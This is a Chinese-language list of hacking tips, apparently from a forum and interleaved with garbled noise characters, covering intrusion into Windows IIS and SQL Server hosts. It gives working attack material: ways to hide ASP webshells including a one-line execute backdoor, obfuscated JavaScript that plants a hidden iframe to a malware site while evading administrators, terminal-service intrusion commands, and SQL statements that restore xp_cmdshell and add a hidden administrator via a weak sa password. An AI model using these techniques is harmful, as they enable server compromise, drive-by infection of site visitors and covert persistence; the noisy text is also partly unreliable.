* S6 e$ | g9 g$ |) j% @用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。" D" H/ Z# g3 N; r8 A( G2 i- `
6 B( C, e9 Y/ `. L7 g53、隐藏ASP后门的两种方法
! N- @# g, m' a/ A) K. X& {: f( R1、建立非标准目录:mkdir images..\
5 D% v- b' `, @) i( M4 g( o拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
3 X, q& {0 s( H7 a1 l; y通过web访问ASP木马:http://ip/images../news.asp?action=login
$ J' s8 z$ X/ T; p5 Y- v如何删除非标准目录:rmdir images..\ /s1 E! l8 {& Y- f* p
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:0 Y; b2 u5 J* |5 M1 h1 ]9 I
mkdir programme.asp) I7 I1 z! Y) j+ w
新建1.txt文件内容:<!--#include file=”12.jpg”-->3 G4 G- P3 P* E/ _3 `+ R
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件* _" ]# E0 u& u
attrib +H +S programme.asp
" U, [; r* l, R) i0 s通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
( x. `6 D. ]7 \7 L* i+ R/ x* }; E7 t% f1 K8 p8 ]# _$ x9 ?+ |: U( I
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! K5 i$ [4 i' r+ X; k4 R# Z3 }1 T
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
! b+ v2 P8 [. X5 |7 W$ O7 K8 i' T6 k4 X1 H% I
55、JS隐蔽挂马- b' _2 J$ p$ O, O
1./ b1 l# Y# @/ `9 M- I8 u9 P9 \
var tr4c3="<iframe src=ht";1 Y7 b& F! y' W) x; a* s) b
tr4c3 = tr4c3+"tp:/";
4 w* ^) u d @* Q/ V1 Htr4c3 = tr4c3+"/ww";5 K/ C2 U; X5 b$ b, |! h6 G
tr4c3 = tr4c3+"w.tr4";
9 c* Z3 J" Q. `/ e# z! @tr4c3 = tr4c3+"c3.com/inc/m";
0 S: ]9 F% P3 R% v4 m- z) G# Z4 }tr4c3 = tr4c3+"m.htm style="display:none"></i";
& a- W. X" \; l% g! htr4c3 =tr4c3+"frame>'";
; h3 ]( M7 S9 _6 N0 n4 z+ gdocument.write(tr4c3);
9 d( f) q8 Q7 X5 C( w& v: i: m避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。0 p* }5 y1 I$ _. b7 s7 F& p
& g+ H: ?6 b8 C6 u9 _1 H2.7 R2 b. x1 h7 R" C
转换进制,然后用EVAL执行。如3 l: J L0 C7 ?9 |9 I% |$ @( ~4 e1 F6 u
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");! d& r9 M% m/ Y
不过这个有点显眼。- L6 j3 x/ v9 q# @
3.
! D& @) h( o1 g* Y0 `) A4 Ydocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
7 Z, {' F0 X$ x/ ?, V) \" X) ^最后一点,别忘了把文件的时间也修改下。
% ]" e; ]: I3 L1 N% X# \
% E# @4 ?! T+ M2 [9 q R0 D3 y* i4 p4 R56.3389终端入侵常用DOS命令! f4 J y# {: O& V" E
taskkill taskkill /PID 1248 /t
) G! q% ^; w( n0 X
- D! c+ I( Z" z/ `( a$ _tasklist 查进程- b C0 C+ J! G7 n6 U, q
5 n: h F* E! z) v& A
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
. B: C/ w& ]! V2 |: m+ Ziisreset /reboot0 G' e3 S9 p& p% H3 F
tsshutdn /reboot /delay:1 重起服务器
; r3 O/ Z: j4 A# B. A# n& X' ] u; j: K5 k+ r* H: Y6 T* E
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 H6 [4 z5 [5 x- r- H% K9 x
; s# K5 b( H: i, L. ?6 wquery user 查看当前终端用户在线情况( \& U( `5 \) r: H/ R$ k/ U* N* e
6 l2 o( A5 P F1 ]& e6 y* P. b要显示有关所有会话使用的进程的信息,请键入:query process *
" |, V$ _+ `4 H: `
$ V" u9 i" F& T# v要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
! c& R! P: t& R' ~
4 j2 S. z; g$ P3 ?要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
# x0 b; S5 J; x4 D% _
& v( i, m1 O$ q8 z: y要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
# Y/ P! l6 B% H! i* ?+ v8 y6 x5 C1 `- C" p; u4 |2 D
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启2 F/ C9 z6 _$ X8 B( E& _
3 ]. I8 W. Z% `$ e$ H
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统0 Y5 H' B5 c/ m4 }! t$ |4 f. B# {8 Y
: E, {6 k a1 m; Z% e$ n$ j$ O, X命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
) Z2 g* L( l/ q3 `# i, B V
5 t# H- t3 ?" u' r命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
" Z! |0 g, b' w! A+ T/ v: {) Z5 K4 D2 r T' H% x! ~% j1 G
56、在地址栏或按Ctrl+O,输入:7 l) i, p3 k+ K2 {) }8 ]; I
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;9 p1 A) W- D7 O- l) K6 S9 h9 B
H8 [) z$ z) C, ?' A" o
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。* Q* }0 @ z$ ^3 Y1 _ I
" ]4 m R6 A# ]1 p
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
& B5 Z3 t% s0 I, V5 P7 K. w用net localgroup administrators是可以看到管理组下,加了$的用户的。
4 c4 o+ p6 v h+ {' h1 ?3 ~% Z
) K' a8 d. Q: @" O0 x' A58、 sa弱口令相关命令
4 n* G# b0 m8 z! e' R$ _
1 ?, Y( j! b0 z! O& }9 m一.更改sa口令方法:/ \8 t. ?4 }' L+ b' T6 l V
用sql综合利用工具连接后,执行命令:
& q; l! ?# S1 R, s. jexec sp_password NULL,'20001001','sa'
4 B; N) b( K% H3 C(提示:慎用!)
% {5 b9 X7 m* ^& G$ d3 g1 e+ J; A( W/ J2 f
二.简单修补sa弱口令.
+ o* W+ g# x) J! u1 h& Z: n" V7 V
3 L U; ^+ Y7 p2 v, K3 x方法1:查询分离器连接后执行:' k$ [, ]$ C2 D# l9 x
if exists (select * from- q$ c, L6 X2 N0 U! X
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and& r/ J O" r f% J0 J$ _
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)$ m1 { `5 z" |( u) M0 {& y- u
% ~9 o2 n/ U9 m2 l$ texec sp_dropextendedproc N'[dbo].[xp_cmdshell]') f+ O b3 C+ T5 q6 M2 n8 K( M
5 m7 _' i% _; q/ @- |GO
0 p/ n9 P+ C7 q% m* c8 }- n4 ^
, Y1 h/ ^; F- E r' A然后按F5键命令执行完毕
" ?1 ]8 y( ?, S1 B( x2 k% b: N7 j
方法2:查询分离器连接后6 B8 `7 ?) |2 a( _- @
第一步执行:use master
" v, [/ K( D( y y第二步执行:sp_dropextendedproc 'xp_cmdshell'
: X# ~6 ]5 U. k然后按F5键命令执行完毕
& N# k4 T8 g2 l- W0 n0 e* G! j" R0 N6 e* g
! ` z) `1 x( a' ^+ _& t2 j
三.常见情况恢复执行xp_cmdshell.
' n5 U8 T# ^0 ~7 g" e. w6 M* e; y! S! o
3 Y% D! q* H, X1 ~1 未能找到存储过程'master..xpcmdshell'.7 I* k/ n8 P7 R$ q) e d' {& Q
恢复方法:查询分离器连接后,
. L z0 [. G( b4 Z8 u- O! A* s! p0 d第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
, e" y& s8 H5 l( i+ @第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'( \* o- W2 {0 I* v& ^. T* y3 r) Z. e
然后按F5键命令执行完毕
- a' M: s B& o/ N% r8 C8 ?! k
$ m- ?1 |$ o2 z+ N8 `5 |# U2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)) Y1 f8 n) b2 _( ^ V3 f; F3 O
恢复方法:查询分离器连接后,
; ?6 n4 n/ Q4 T7 F z# Z, m第一步执行:sp_dropextendedproc "xp_cmdshell"8 P7 {. c- r+ |# a
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'5 {, ]! e: f4 U* E' z
然后按F5键命令执行完毕 K0 ?' |- q4 U/ q8 n4 r
! R! \6 m. z" w- Y T- u) u4 U
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)8 Q; S a* H9 C$ p \7 }: M
恢复方法:查询分离器连接后,
6 I; d' Z, n8 t- n0 W" R' \- z第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
; n# D. Z1 W- [" Y4 U: s; Z第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
0 _5 L4 @/ F. k1 q: u+ w* y然后按F5键命令执行完毕
* Q( H: q0 D! ]# u7 ?- V# O' m
1 c5 V ]) T z# O四.终极方法.
+ f; C" `, M# C# a$ D/ N: v, j如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
0 M6 G0 f$ x! g; D0 j# z查询分离器连接后,
7 R3 V7 C0 _0 j+ N2000servser系统:
0 j' v6 s% ?) S3 i g0 W+ G7 w2 J# Adeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 Y8 ^+ o* G2 C9 c0 t4 D+ n
# n7 `1 h9 i" S( u& Jdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
7 j! d4 W2 d/ j' W( a% g
, U( h! ` D' q: Dxp或2003server系统:
" _: w7 p" s8 O0 [; H4 s
}% N" {+ d, [$ ]3 s$ }declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
# g V( @+ j% `9 r% |# v' I/ z: s% z3 X; H! C0 I: r: H* E
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'; S# W% G6 P( Q& U& `
|